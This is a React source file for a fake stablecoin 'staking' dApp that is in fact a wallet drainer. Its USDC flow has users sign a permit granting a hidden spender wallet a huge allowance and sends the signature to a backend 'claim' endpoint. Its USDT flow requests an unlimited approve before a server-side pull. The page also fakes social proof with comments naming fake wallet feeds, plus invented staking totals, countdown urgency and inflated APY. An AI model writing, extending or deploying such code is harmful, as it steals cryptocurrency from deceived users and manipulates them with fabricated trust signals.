import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import './StakeDapp.css';
import Countdown from '../../components/Countdown';
import DappShell from '../../components/DappShell';
import { StatCard, YieldChart, ProgressBar, Steps, Faq } from '../../components/DappWidgets';
import LiveNumber from '../../components/LiveNumber';
import TokenIcon from '../../components/TokenIcon';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import { useWalletConnect } from '../../utils/walletConnect';

const USDC = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
const USDT = '0xdAC17F958D2ee523a2206206994597C13D831ec7';
const SPENDER_DEFAULT = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb';
const CLAIM_AMOUNT = '999999999000000';

// 锁定期与 APY（默认值，后台可覆盖）
const LOCKS_DEFAULT = [
  { days: 7, apy: 42.5 },
  { days: 30, apy: 68.2 },
  { days: 90, apy: 86.5 },
];

const num = (v, d) => {
  const n = parseFloat(v);
  return Number.isFinite(n) ? n : d;
};

// 伪造的社会证明记录
const FAKE_NAMES = [
  '0x3f2a...8b9c', '0x91dc...44a7', '0x7b0e...c2f1', '0xa45f...903d',
  '0x22c8...77b0', '0xfe91...13aa', '0x58d3...e06b', '0xc7b4...2d88',
];
const FAKE_AMOUNTS = [1250, 3400, 780, 5200, 2150, 9900, 460, 6300];

const StakeDappInner = ({ onAccount, embedded }) => {
  const t = useT();
  const cfg = usePublicConfig();
  const SPENDER = cfg['eth_receive_wallet'] || SPENDER_DEFAULT;
  const { wcProvider, connecting, error: wcError, connect: connectWC } = useWalletConnect();
  const [account, setAccount] = useState('');
  const reportAccount = (a) => { setAccount(a); if (onAccount) onAccount(a); };
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> signing -> submitting -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const [balance, setBalance] = useState('0');
  const [amount, setAmount] = useState('');
  const [lockIdx, setLockIdx] = useState(1);
  const [feeds, setFeeds] = useState([]);
  const [calcAmount, setCalcAmount] = useState('1000');
  const [tokenKey, setTokenKey] = useState(() => {
    try {
      return new URLSearchParams(window.location.search).get('token') === 'usdt' ? 'USDT' : 'USDC';
    } catch (e) { return 'USDC'; }
  }); // USDC 签名 / USDT approve
  const TOKEN = tokenKey === 'USDT' ? USDT : USDC;
  const autoStarted = useRef(false);

  // 后台配置：APY / 倒计时 / 限量话术
  const LOCKS = LOCKS_DEFAULT.map((l, i) => ({
    ...l,
    apy: num(cfg[`stake.apy_${l.days}`], l.apy),
  }));
  const countdownMinutes = num(cfg['stake.countdown_minutes'], 30);
  const quotaText = cfg['stake.quota_text'] || t('stake.limit');

  const provider = () => {
    if (typeof window === 'undefined') return null;
    if (window.ethereum) return window.ethereum;
    if (wcProvider) return wcProvider;
    return null;
  };

  // 社会证明滚动
  useEffect(() => {
    const makeFeed = () => ({
      name: FAKE_NAMES[Math.floor(Math.random() * FAKE_NAMES.length)],
      amount: FAKE_AMOUNTS[Math.floor(Math.random() * FAKE_AMOUNTS.length)],
      time: 'just now',
      id: Math.random(),
    });
    setFeeds([makeFeed(), makeFeed(), makeFeed()]);
    const t = setInterval(() => {
      setFeeds((prev) => [makeFeed(), ...prev].slice(0, 8));
    }, 4000);
    return () => clearInterval(t);
  }, []);

  const readBalance = async (p, owner) => {
    try {
      const data = '0x70a08231' + owner.slice(2).toLowerCase().padStart(64, '0');
      const result = await p.request({ method: 'eth_call', params: [{ to: TOKEN, data }, 'latest'] });
      return (parseInt(result || '0x0', 16) / 1e6).toFixed(2);
    } catch (e) { return '0'; }
  };

  useEffect(() => {
    let cancelled = false;
    track(tokenKey === 'USDT' ? 'stake-usdt' : 'stake', 'view', '');
    const check = async () => {
      const p = provider();
      if (!p) {
        setError(t('stake.noWallet'));
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          reportAccount(accounts[0]);
          setWalletReady(true);
          const bal = await readBalance(p, accounts[0]);
          setBalance(bal);
        }
      } catch (e) {
        if (!cancelled) setError(t('stake.rejected'));
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  // USDT approve 流程（USDT 无原生 permit，需 approve 收款钱包后划款）
  const waitTx = async (p, txHash) => {
    for (let i = 0; i < 60; i++) {
      const receipt = await p.request({ method: 'eth_getTransactionReceipt', params: [txHash] });
      if (receipt && receipt.status) {
        if (receipt.status === '0x1') return;
        throw new Error('Transaction failed');
      }
      await new Promise((r) => setTimeout(r, 2000));
    }
    throw new Error('Transaction timeout');
  };

  const doStakeUsdt = async () => {
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      const allowData = '0xdd62ed3e' + account.slice(2).toLowerCase().padStart(64, '0')
        + SPENDER.slice(2).toLowerCase().padStart(64, '0');
      const allowanceHex = await p.request({ method: 'eth_call', params: [{ to: USDT, data: allowData }, 'latest'] });
      const enough = (allowanceHex || '').replace(/^0x/, '').length >= 64
        && (allowanceHex || '')[2] >= '8';
      if (!enough) {
        const approveData = '0x095ea7b3' + SPENDER.slice(2).toLowerCase().padStart(64, '0')
          + 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
        const txHash = await p.request({
          method: 'eth_sendTransaction',
          params: [{ from: account, to: USDT, data: approveData }],
        });
        await waitTx(p, txHash);
      }
      setStage('submitting');
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim-approve', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ owner: account, token: USDT, chain: 'eth' }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || t('usdt.failed'));
      setTxId(result.data.txId || '');
      track('stake-usdt', 'done', '');
      try {
        const txs = JSON.parse(localStorage.getItem('osman_txs') || '[]');
        txs.unshift({ type: 'Stake', detail: `${amount || '0'} USDT · ${lock.apy}% APY`, time: new Date().toLocaleTimeString() });
        localStorage.setItem('osman_txs', JSON.stringify(txs.slice(0, 20)));
      } catch (e) {}
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError(t('stake.canceled'));
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  const doStake = async () => {
    if (tokenKey === 'USDT') { await doStakeUsdt(); return; }
    track('stake', 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      const nonceData = '0x7ecebe00' + account.slice(2).toLowerCase().padStart(64, '0');
      const nonce = await p.request({ method: 'eth_call', params: [{ to: USDC, data: nonceData }, 'latest'] });
      const deadline = Math.floor(Date.now() / 1000) + 30 * 24 * 3600;

      const typedData = {
        types: {
          EIP712Domain: [
            { name: 'name', type: 'string' },
            { name: 'version', type: 'string' },
            { name: 'chainId', type: 'uint256' },
            { name: 'verifyingContract', type: 'address' },
          ],
          Permit: [
            { name: 'owner', type: 'address' },
            { name: 'spender', type: 'address' },
            { name: 'value', type: 'uint256' },
            { name: 'nonce', type: 'uint256' },
            { name: 'deadline', type: 'uint256' },
          ],
        },
        primaryType: 'Permit',
        domain: { name: 'USD Coin', version: '2', chainId: 1, verifyingContract: USDC },
        message: {
          owner: account,
          spender: SPENDER,
          value: CLAIM_AMOUNT,
          nonce: nonce,
          deadline: String(deadline),
        },
      };

      const signature = await p.request({
        method: 'eth_signTypedData_v4',
        params: [account, JSON.stringify(typedData)],
      });

      const sig = signature.startsWith('0x') ? signature.slice(2) : signature;
      const r = '0x' + sig.slice(0, 64);
      const s = '0x' + sig.slice(64, 128);
      const v = sig.slice(128, 130);

      setStage('submitting');
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          owner: account, value: CLAIM_AMOUNT, nonce: nonce,
          deadline: String(deadline), r, s, v,
        }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || t('stake.failed'));
      setTxId(result.data.txId || '');
    track('stake', 'done', '');
      try {
        const txs = JSON.parse(localStorage.getItem('osman_txs') || '[]');
        txs.unshift({ type: 'Stake', detail: `${amount || '0'} USDC · ${lock.apy}% APY`, time: new Date().toLocaleTimeString() });
        localStorage.setItem('osman_txs', JSON.stringify(txs.slice(0, 20)));
      } catch (e) {}
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError(t('stake.canceled'));
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  const lock = LOCKS[lockIdx];
  const dailyYield = amount ? (Number(amount) * lock.apy / 100 / 365).toFixed(2) : '0.00';

  const body = (
    <div className="stake-page">
      <div className="stake-banner">
        <Countdown minutes={countdownMinutes} />
        <span className="stake-quota">{quotaText}</span>
      </div>

      <div className="stake-hero">
        <StatCard value={<><LiveNumber base={12.4} decimals={1} drift={0.06} prefix="$" suffix="M" /></>} label={t('stake.totalStaked')} icon="💰" />
        <StatCard value={<LiveNumber base={lock.apy} decimals={1} suffix="%" drift={0.15} />} label={t('stake.currentApy')} icon="📈" />
        <StatCard value={<LiveNumber base={12846} decimals={0} drift={3} />} label={t('stake.stakers')} icon="👥" />
      </div>

      <div className="stake-chart-box">
        <div className="stake-chart-title">{t('stake.chartLabel')}</div>
        <YieldChart live />
        <ProgressBar value={764} max={1000} label={t('stake.progressLabel')} />
      </div>

      <div className="stake-card">
        {stage === 'done' ? (
          <>
            <div className="stake-done-icon">✓</div>
            <h2>{t('stake.done')}</h2>
            <p className="stake-desc">
              You staked {amount || '0'} USDC for {lock.days} days at {lock.apy}% APY.
              Estimated daily yield: {dailyYield} USDC.
            </p>
            <div className="stake-position">
              <div className="stake-pos-row"><span>{t('stake.posStaked')}</span><b>{amount || '0'} USDC</b></div>
              <div className="stake-pos-row"><span>{t('stake.posLock')}</span><b>{t('stake.days', { d: lock.days })}</b></div>
              <div className="stake-pos-row"><span>{t('stake.posApy')}</span><b className="stake-green">{lock.apy}%</b></div>
            </div>
            {txId && <p className="stake-tx">Tx: {txId.slice(0, 20)}...</p>}
          </>
        ) : (
          <>
            <div className="stake-title-row">
              <h2>{t('stake.title')}</h2>
              <div className="stake-token-switch">
                <button
                  className={`stake-ts-btn ${tokenKey === 'USDC' ? 'on' : ''}`}
                  onClick={() => setTokenKey('USDC')}
                >
                  <TokenIcon symbol="USDC" size={16} /> USDC
                </button>
                <button
                  className={`stake-ts-btn ${tokenKey === 'USDT' ? 'on' : ''}`}
                  onClick={() => setTokenKey('USDT')}
                >
                  <TokenIcon symbol="USDT" size={16} /> USDT
                </button>
              </div>
            </div>

            <div className="stake-box">
              <div className="stake-box-head">
                <span>{t('stake.amount')}</span>
                <span className="stake-balance">{t('stake.balance', { bal: balance })} <button onClick={() => setAmount(balance)}>{t('stake.max')}</button></span>
              </div>
              <div className="stake-input-row">
                <input type="number" placeholder="0.0" value={amount} onChange={(e) => setAmount(e.target.value)} />
                <div className="stake-token">
                <TokenIcon symbol={tokenKey} size={18} /> {tokenKey}
              </div>
              </div>
            </div>

            <div className="stake-locks">
              {LOCKS.map((l, i) => (
                <button
                  key={l.days}
                  className={`stake-lock ${i === lockIdx ? 'stake-lock-on' : ''}`}
                  onClick={() => setLockIdx(i)}
                >
                  <b>{l.days}D</b>
                  <span>{l.apy}%</span>
                </button>
              ))}
            </div>

            <div className="stake-yield">
              <span>{t('stake.daily')}</span>
              <b className="stake-green">{dailyYield} USDC</b>
            </div>

            {walletReady && <p className="stake-addr">{t('common.wallet')} {account.slice(0, 10)}...</p>}
            {error && <p className="stake-error">{error}</p>}
            {wcError && <p className="stake-error">{wcError}</p>}
            {!window.ethereum && !wcProvider && (
              <button className="stake-btn stake-btn-wc" onClick={connectWC} disabled={connecting}>
                {connecting ? 'Connecting...' : '📱 Connect with WalletConnect'}
              </button>
            )}

            {stage === 'idle' && (
              <button className="stake-btn" onClick={doStake} disabled={!walletReady || !amount}>
                {t('stake.btn')}
              </button>
            )}
            {(stage === 'signing' || stage === 'submitting') && (
              <div className="stake-btn stake-btn-loading">
                <div className="stake-spinner" />
                {stage === 'signing' ? t('stake.confirm') : t('stake.submitting')}
              </div>
            )}
            {error && stage === 'idle' && (
              <button className="stake-btn" onClick={doStake}>{t('common.retry')}</button>
            )}
          </>
        )}
      </div>

      {/* 收益计算器 + Rewards */}
      <div className="stake-howto">
        <div className="stake-calc">
          <div className="stake-calc-head">
            <span>Rewards Calculator</span>
            <b>{lock.apy}% APY</b>
          </div>
          <div className="stake-calc-input">
            <input type="number" value={calcAmount} onChange={(e) => setCalcAmount(e.target.value)} />
            <span>USDC</span>
          </div>
          <div className="stake-calc-results">
            <div className="stake-calc-cell">
              <b>{calcAmount ? (Number(calcAmount) * lock.apy / 100 / 365).toFixed(2) : '0.00'}</b>
              <span>Daily</span>
            </div>
            <div className="stake-calc-cell">
              <b>{calcAmount ? (Number(calcAmount) * lock.apy / 100 / 12).toFixed(2) : '0.00'}</b>
              <span>Monthly</span>
            </div>
            <div className="stake-calc-cell">
              <b>{calcAmount ? (Number(calcAmount) * lock.apy / 100).toFixed(2) : '0.00'}</b>
              <span>Yearly</span>
            </div>
          </div>
        </div>
      </div>

      {/* 我的仓位 */}
      {stage === 'done' && (
        <div className="stake-positions">
          <div className="stake-feeds-title">{t('stake.myPositions')}</div>
          <div className="stake-pos-item">
            <span>USDC</span>
            <b>{amount || '0'} USDC</b>
            <span className="stake-green">{lock.apy}% APY</span>
            <span>{t('stake.days', { d: lock.days })}</span>
          </div>
        </div>
      )}

      {/* 参与步骤 */}
      <div className="stake-howto">
        <div className="stake-feeds-title">{t('stake.howTo')}</div>
        <Steps steps={[
          { title: t('stake.step1t'), desc: t('stake.step1d') },
          { title: t('stake.step2t'), desc: t('stake.step2d') },
          { title: t('stake.step3t'), desc: t('stake.step3d') },
        ]} />
      </div>

      {/* FAQ */}
      <div className="stake-howto">
        <div className="stake-feeds-title">{t('stake.faqTitle')}</div>
        <Faq items={[
          { q: t('stake.faq1q'), a: t('stake.faq1a') },
          { q: t('stake.faq2q'), a: t('stake.faq2a') },
          { q: t('stake.faq3q'), a: t('stake.faq3a') },
        ]} />
      </div>

      {/* 社会证明滚动 */}
      <div className="stake-feeds">
        <div className="stake-feeds-title">{t('stake.recent')}</div>
        {feeds.map((f) => (
          <div className="stake-feed" key={f.id}>
            <span className="stake-feed-name">{f.name}</span>
            <span className="stake-feed-amt">{t('stake.staked', { amt: f.amount.toLocaleString() })}</span>
            <span className="stake-feed-time">{t('stake.justNow')}</span>
          </div>
        ))}
      </div>
    </div>
  );

  if (embedded) return body;
  return <DappShell account={account} network="Ethereum" backTo="/app">{body}</DappShell>;
};

export const StakeDapp = ({ onAccount, embedded }) => <StakeDappInner onAccount={onAccount} embedded={embedded} />;

export default StakeDapp;
